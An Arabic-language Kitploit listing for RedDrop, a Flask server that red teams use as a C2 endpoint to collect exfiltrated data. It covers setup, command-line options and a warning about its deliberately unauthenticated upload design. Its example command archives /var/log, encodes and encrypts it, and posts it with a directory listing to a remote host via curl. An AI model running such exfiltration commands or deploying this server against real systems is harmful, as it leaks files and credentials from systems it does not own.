Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RedDrop — خادم ويب بلغة Python Flask لالتقاط ومعالجة وتسجيل الحمولات المشفرة/المشفرة وأرشيفات tar، مصمم لاختبار الاختراق وفرق الاختبارات الحمراء كطرفية لاستخراج بيانات C2. | Kitploit
أدوات/GitHubGitHub/cyberbutler/reddrop
توليد الحمولةتسريب البياناتأمن الويبالقيادة والسيطرةالفريق الأحمر
GitHubcyberbutler/reddrop

RedDrop

خادم ويب بلغة Python Flask لالتقاط ومعالجة وتسجيل الحمولات المشفرة/المشفرة وأرشيفات tar، مصمم لاختبار الاختراق وفرق الاختبارات الحمراء كطرفية لاستخراج بيانات C2.

عرض المستودع
586منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Red Drop

خادم تسريب RedDrop

اطّلع على مقال مدونة MaverisLabs المصاحب من هنا!

خادم تسريب RedDrop هو خادم ويب مكتوب بلغة Python Flask، مصمم لمختبرَي الاختراق، وفرق الاختبارات الحمراء، ومحترفي الأمن، ويتميز بـ:

  • رفع الملفات
  • معالجة الحمولات تلقائيًا
  • استخراج الأرشيفات تلقائيًا
  • تسجيل JSON
  • خيارات قابلة للتكوين
  • قواعد الترخيص

هذه الأداة مصممة للاستخدام كنقطة نهاية بدائية لـ C2 لالتقاط بيانات طلبات الويب في سيناريوهات متنوعة. بعض الأمثلة تشمل:

  • ثغرة حقن أوامر أعمى
  • هجوم XSS عندما تحتاج إلى خادم تسجيل طلبات ويب سريع وديناميكي
  • موقف تم فيه الحصول على وصول عن بُعد لـ shell وتريد خادم تسريب ويب مع تسجيل مفصَّل

عرض توضيحي

عرض توضيحي

هذا المشروع لا يزال قيد التطوير، وقد تكون بعض الميزات غير مستقرة. إذا واجهت مشاكل، يُرجى فتح Issue!

ملاحظة حول الأمان

لا ينبغي ترك هذا البرنامج مفتوحًا للإنترنت بشكل عام. فهو مبني على ما قد يعتبره البعض ثغرة رفع ملفات تعسفية عن قصد، وسيقبل الملفات ويحفظها على القرص المحلي دون مصادقة. يجب اتخاذ الحيطة اللازمة لضمان تأمين النظام الذي يُنشر عليه هذا البرنامج. بعض التوصيات:

  • استخدم ميزة قواعد الترخيص في RedDrop لرفض الطلبات التي لا تستوفي معاييرك.
  • ضع خادمًا عكسيًا (Reverse Proxy) لتوجيه ومنع حركة المرور إلى تطبيق الويب هذا.
  • قم بتقييد عنوان IP الخاص بهدفك بالقائمة البيضاء.
  • لا تستخرج الأرشيفات تلقائيًا دون فهم طريقة التصفية الخاصة بي.

بداية سريعة

Docker

root@kitploit:~
mkdir uploads logs
docker run --rm -t -v "$PWD/uploads:/reddrop/uploads" -v "$PWD/logs:/reddrop/logs" -p "80:80" --name reddrop cyberbutler/reddrop -h

PipEnv

root@kitploit:~
pip install --user pipenv
pipenv install
pipenv shell
python reddrop-server.py -h

الخيارات

root@kitploit:~
python reddrop-server.py -h

     A Webserver for File and Data Exfiltration.
        Author: @cyberbutler/@thecyberbutler

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -H HOST  The host IP Address to bind to (default:
                        0.0.0.0)
  --port PORT, -P PORT  The port to bind to (default: 80)
  -c CONFIG, --config CONFIG
                        YAML config file path (default: None)
  --dump-config         Dump the configuration settings as YAML
                        (default: False)
  --debug               Enable Flask's Debug Mode (default: False)
  -p {hex,openssl-aes256-pbkdf2,gzip,b64}, --processor {hex,openssl-aes256-pbkdf2,gzip,b64}
                        Specify a processor to use. This flag can
                        be used more than once to define multiple
                        process_list functions. Use this flag in
                        the order in which you wish to process
                        received data (default: [])
  -A, --auto-process, --no-auto-process
                        Automatically run processors based on
                        detected data. This option is enabled by
                        default, but should be disabled (--no-
                        auto-process) when you receive output you
                        don't expect. Such as in the case of
                        Base64 decoding being run on output that
                        is not Base64 encoded. Instead, force the
                        process with the `-p` flag. (default:
                        True)
  --auto-extract-tar, -x
                        Auto extract TAR archives received by the
                        server. (default: False)
  --encryption-password PROCESSOR_ARGUMENTS.OPENSSL-AES256-PBKDF2.PASSWORD
                        The password used to decrypt/encrypt.
                        (default: EncryptMe)
  -r AUTHORIZATION_RULES, --authorization_rules AUTHORIZATION_RULES
                        Specify an Authorization Rule to deny
                        requests which do not match the provided
                        Key and Regex value pair. Specified as
                        <Key>=<Regex>. (default: None)
  -t TAGS, --tag TAGS   Tag data received during this session in the logs as well as the directory files are uploaded to. Example:
                        -t log4j -t acme.org (default: None)
  --tls-keyfile GUNICORN.KEYFILE
                        Enables TLS Support. (Production Only) The path to a TLS key file (default: None)
  --tls-certfile GUNICORN.CERTFILE
                        Enables TLS Support. (Production Only) The path to a TLS cert file (default: None)

Far more configuration options exist which must be specified in Environment Variables, use `--dump-config` to see all of the options

أمثلة

تسريب أرشيف Tar ومخرجات أوامر من نظام Linux

root@kitploit:~
tar cz /var/log | base64 | xxd -ps | gzip | openssl enc -aes-256-cbc -pass 'pass:EncryptMe' -e -a -pbkdf2 | curl 172.17.0.1$PWD -F 'logs=@-' -F "listing=`ls -al * | gzip | base64`"

example-screenshot.png

قائمة المهام

  • توثيق أوسع للتقنيات التي تستخدم خادم الويب هذا
  • معالجة رفع الملفات المجزأة وأمثلة أوامر
  • المزيد من وحدات المعالجة
  • توسيع وظيفة استخراج الأرشيفات
تنزيل الأداة